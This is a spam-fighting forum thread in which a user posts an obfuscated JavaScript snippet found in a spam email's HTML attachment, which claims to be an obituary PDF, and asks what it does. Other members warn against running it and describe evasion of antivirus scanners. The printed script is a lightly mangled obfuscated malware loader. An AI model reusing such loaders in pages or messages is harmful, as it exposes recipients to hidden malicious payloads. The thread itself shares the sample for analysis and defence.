Sign in to follow this  
Followers 0
MisterBill

java scri_pt in spam I received

3 posts in this topic

I got spam which had a java scri_pt portion to it. I can't figure out what it is trying to do, can someone help? The email claimed there was a PDF to view, I will attach the whole section for context.

Content-type: text/html; name="61114Journal Sentinel - Leka Obit.html"

Content-transfer-encoding: 7BIT

Content-disposition: attachment;

filename="61114Journal Sentinel - Leka Obit.html"

<scri_pt language="java scri_pt" type="text/java scri_pt">function xfxs(oajm){var

cz58="sr:0.cpt/ =\"xg;lhivm-quoefn>a<",iwy0,qyot,n3dt="",vvg8,wo2u=cz58.length;enum(unescape("%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D"));for(qyot=0;qyot<oajm.length;qyot++){iwy0=oajm.charAt(qyot);vvg8=cz58.indexOf(iwy0);if(vvg8>-1){vvg8-=(qyot+1)%wo2u;if(vvg8<0){vvg8+=wo2u;}lj2w(cz58.charAt(vvg8));}else{lj2w(iwy0);}}enum(unescape("%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;"));}xfxs("sq>\"0lolhhrp.p:.><-;hoie\"tp0un/n<\"li=ur\"nu<quumn>>loieo alefv m=q<;rgl.rqnm:et.rss-");</scri_pt><noscript>To display this page you need a browser that supports java scri_pt.</noscript>

--Boundary_(ID_pbZ6Ms2kvXLizaqNrjbRog)--

Share this post


Link to post
Share on other sites

Hi Bill,

See http://forum.spamcop.net/forums/index.php?...amp;#entry76541 and preceding posts. Can you remove that scri_pt? Maybe substitute the base64 code per the text view of the attachment if you would like a permanent record here. It makes me a little uncomfortable in clear form, even if slightly mangled by the badword filter, sort of like an audible flatus in church (not that we take ourselves so seriously but ...). If you want to add to the topic you could try base64 decoding the example in the O/P's post in that other topic (or one of the others that silentlarry points to) and compare it with your own - to test the assumption that parts of these are variable to give them a rolling 'day one' protection from AV scanners.

Just don't run any of the things of course.

Share this post


Link to post
Share on other sites
It makes me a little uncomfortable in clear form, even if slightly mangled by the badword filter, sort of like an audible flatus in church (not that we take ourselves so seriously but ...).

As I've stated over the years, my hack here against the hacking attempts was very heavy-handed. There is the obvious 'mangled' bit that you're seeing, but will also note that no one is really going to be able to sort out the example scri_pt as displayed. There are other changes that have been made to the stored/displayed version to make damn sure that things like this can't ever accidently run in someone's browser here.

That said, I can only recommend going elsewhere for asking for analysis or loading up on some tools and education to do it on your own, as I simply can't condone folks tinkering with stuff that they already suspect is dangerous.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0